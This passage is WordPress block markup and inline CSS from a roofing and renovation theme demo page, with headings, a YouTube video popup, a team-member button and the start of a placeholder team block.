.skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"67a82438-88af-4556-ac9e-4c3da247e0cf\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-67a82438-88af-4556-ac9e-4c3da247e0cf\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"72cbdd00-2b42-4deb-a7fd-0c19210e65bf\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ce6cb053-1ec8-4c04-85db-13a427505324\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-ce6cb053-1ec8-4c04-85db-13a427505324 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"9f4663ea-a5db-40fc-b1cc-f21b84eb8759\"} -->\n<style type=\"text/css\"> .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"91d4b807-310e-4d33-9c09-5410cb4f7c01\"} -->\n<style type=\"text/css\"> .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-91d4b807-310e-4d33-9c09-5410cb4f7c01\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"7b681c73-1c40-4bb3-af82-2e7717982562\"} -->\n<style type=\"text/css\"> .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7b681c73-1c40-4bb3-af82-2e7717982562\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"3ae9a34b-e7e2-43ff-99a6-51ffbdeca952\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\" rel=\"noopener noreferrer\" target=\"_blank\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 